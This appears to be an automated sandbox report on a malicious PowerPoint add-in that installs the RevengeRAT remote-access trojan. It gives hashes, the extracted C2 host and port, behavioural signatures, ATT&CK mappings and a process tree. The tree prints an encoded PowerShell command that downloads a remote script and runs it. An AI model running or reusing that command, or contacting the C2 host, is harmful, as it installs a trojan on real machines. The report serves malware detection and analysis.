Resubmissions

19-03-2024 13:33

240319-qtxgxsdb72 10

14-03-2024 02:49

240314-da2ajsbb65 10

Analysis

  • max time kernel
    50s
  • max time network
    54s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    19-03-2024 13:33

General

  • Target

    dbcb21d5f9c1a74aaeacb6fd5e4bda89af7cf80461eae3fa3c61a8bb90bf5044.ppam

  • Size

    21KB

  • MD5

    0fa350aeda0300d702cbffe77bdf26e1

  • SHA1

    3b9a66fd26bfd26cff53e222744b382da0735c74

  • SHA256

    dbcb21d5f9c1a74aaeacb6fd5e4bda89af7cf80461eae3fa3c61a8bb90bf5044

  • SHA512

    d4514a79d24d5b165f0588cfa370a92e6d781add023878b515248c453153e26b9e701b2d5b7a1e02976783ba5925a0fd353d25ab8510419c4b6b30df2858e0d1

  • SSDEEP

    384:dXP27u0zBE0RZ+T9cx/7tsZKhNVqo6JV5ZjXDcd42nS5wYFjg1zTeQcxUwPMyvxh:VP2r60L+BS6ZkHqxJZkd42Sr9g1Xed0k

Malware Config

Extracted

Family

revengerat

Botnet

NyanCatRevenge

C2

craxsrat.ddns.com.br:333

Mutex

27d7e6701f5e

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RevengeRAT

    Remote-access trojan with a wide range of capabilities.

  • Blocklisted process makes network request 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Opens file in notepad (likely ransom note) 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE" "C:\Users\Admin\AppData\Local\Temp\dbcb21d5f9c1a74aaeacb6fd5e4bda89af7cf80461eae3fa3c61a8bb90bf5044.ppam"
    1⤵
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of WriteProcessMemory
    PID:2924
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2892
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e SQBFAFgAIAAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAuAEkAbgB2AG8AawBlACgAJwANAAoAaAB0AHQAcABzADoALwAvAGYAaQByAGUAYgBhAHMAZQBzAHQAbwByAGEAZwBlAC4AZwBvAG8AZwBsAGUAYQBwAGkAcwAuAGMAbwBtAC8AdgAwAC8AYgAvAHQAZQBzAHQAaQBuAGcALQBlAGEAZgAyADgALgBhAHAAcABzAHAAbwB0AC4AYwBvAG0ALwBvAC8AUgBFAFYARQBOAEcARQBSAC4AagBwAGcAPwBhAGwAdAA9AG0AZQBkAGkAYQAmAHQAbwBrAGUAbgA9ADYAOQBjADAAYgBmADUAOAAtADIAYwBiADAALQA0AGYANwA2AC0AOAA2ADQAOQAtAGEANgA2AGUANQA0AGIANgA2ADkANAAwAA0ACgAnACkAOwAgAA0ACgBBAHUAawB3AFoARABlAGsAawBXAHAAZABmAG8AdABmAEkASQBaAFQARwBrAEgAYwBOAEgATAB1AEEAdABVAGUAQwBOAGQASABPAFYATgBBAA0ACgA=""
        2⤵
        • Process spawned unexpected child process
        • Blocklisted process makes network request
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1532
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
          3⤵
          • Checks processor information in registry
          PID:2412
    • C:\Windows\explorer.exe
      "C:\Windows\explorer.exe"
      1⤵
        PID:356
      • C:\Windows\system32\NOTEPAD.EXE
        "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\AddGet.ps1xml
        1⤵
        • Opens file in notepad (likely ransom note)
        PID:2024
      • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
        "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\Documents\Are.docx"
        1⤵
        • Drops file in Windows directory
        • Suspicious behavior: AddClipboardFormatListener
        • Suspicious use of SetWindowsHookEx
        PID:2484

      Network

      MITRE ATT&CK Matrix ATT&CK v13

      Defense Evasion

      Modify Registry

      1
      T1112

      Discovery

      Query Registry

      1
      T1012

      System Information Discovery

      1
      T1082

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm
        Filesize

        20KB

        MD5

        e1e1c15fc2aa55aeedde650d55307292

        SHA1

        48345f7a801b9b770551cfc6fe350d6351c55ca9

        SHA256

        d1ad92ef076bfbd97e6a07389bb169d21b29ee3b2f647e6dd24abd5029bdee60

        SHA512

        770bf764be72b2d2138ca783d15862795e0d333ca0e25edeaa9b0c17b86f1a5ee3907da65759a1d966b89635151352ef3fc61e6f87c8cd7fb3feb5cc9ecb9523

      • memory/1532-12-0x0000000002C00000-0x0000000002C40000-memory.dmp
        Filesize

        256KB

      • memory/1532-46-0x000000006AD40000-0x000000006B2EB000-memory.dmp
        Filesize

        5.7MB

      • memory/1532-29-0x0000000002970000-0x0000000002971000-memory.dmp
        Filesize

        4KB

      • memory/1532-27-0x0000000002930000-0x0000000002948000-memory.dmp
        Filesize

        96KB

      • memory/1532-11-0x000000006AD40000-0x000000006B2EB000-memory.dmp
        Filesize

        5.7MB

      • memory/1532-23-0x0000000002930000-0x0000000002948000-memory.dmp
        Filesize

        96KB

      • memory/1532-13-0x000000006AD40000-0x000000006B2EB000-memory.dmp
        Filesize

        5.7MB

      • memory/1532-14-0x0000000002C00000-0x0000000002C40000-memory.dmp
        Filesize

        256KB

      • memory/1532-25-0x0000000002930000-0x0000000002948000-memory.dmp
        Filesize

        96KB

      • memory/1532-16-0x0000000002930000-0x0000000002948000-memory.dmp
        Filesize

        96KB

      • memory/1532-17-0x0000000002930000-0x0000000002948000-memory.dmp
        Filesize

        96KB

      • memory/1532-19-0x0000000002930000-0x0000000002948000-memory.dmp
        Filesize

        96KB

      • memory/1532-21-0x0000000002930000-0x0000000002948000-memory.dmp
        Filesize

        96KB

      • memory/2412-45-0x0000000066E40000-0x000000006752E000-memory.dmp
        Filesize

        6.9MB

      • memory/2412-44-0x0000000000400000-0x000000000040A000-memory.dmp
        Filesize

        40KB

      • memory/2412-51-0x0000000066E40000-0x000000006752E000-memory.dmp
        Filesize

        6.9MB

      • memory/2412-47-0x0000000004A00000-0x0000000004A40000-memory.dmp
        Filesize

        256KB

      • memory/2412-42-0x0000000000400000-0x000000000040A000-memory.dmp
        Filesize

        40KB

      • memory/2412-30-0x0000000000400000-0x000000000040A000-memory.dmp
        Filesize

        40KB

      • memory/2412-32-0x0000000000400000-0x000000000040A000-memory.dmp
        Filesize

        40KB

      • memory/2412-34-0x0000000000400000-0x000000000040A000-memory.dmp
        Filesize

        40KB

      • memory/2412-36-0x0000000000400000-0x000000000040A000-memory.dmp
        Filesize

        40KB

      • memory/2412-38-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
        Filesize

        4KB

      • memory/2412-40-0x0000000000400000-0x000000000040A000-memory.dmp
        Filesize

        40KB

      • memory/2484-52-0x000000002F371000-0x000000002F372000-memory.dmp
        Filesize

        4KB

      • memory/2484-90-0x0000000070A6D000-0x0000000070A78000-memory.dmp
        Filesize

        44KB

      • memory/2484-54-0x0000000070A6D000-0x0000000070A78000-memory.dmp
        Filesize

        44KB

      • memory/2484-53-0x000000005FFF0000-0x0000000060000000-memory.dmp
        Filesize

        64KB

      • memory/2924-2-0x0000000071CED000-0x0000000071CF8000-memory.dmp
        Filesize

        44KB

      • memory/2924-49-0x000000005FFF0000-0x0000000060000000-memory.dmp
        Filesize

        64KB

      • memory/2924-50-0x0000000071CED000-0x0000000071CF8000-memory.dmp
        Filesize

        44KB

      • memory/2924-7-0x0000000005580000-0x0000000005680000-memory.dmp
        Filesize

        1024KB

      • memory/2924-28-0x0000000004770000-0x0000000004870000-memory.dmp
        Filesize

        1024KB

      • memory/2924-15-0x0000000071CED000-0x0000000071CF8000-memory.dmp
        Filesize

        44KB

      • memory/2924-0-0x000000002D391000-0x000000002D392000-memory.dmp
        Filesize

        4KB

      • memory/2924-1-0x000000005FFF0000-0x0000000060000000-memory.dmp
        Filesize

        64KB

      • memory/2924-6-0x0000000004770000-0x0000000004870000-memory.dmp
        Filesize

        1024KB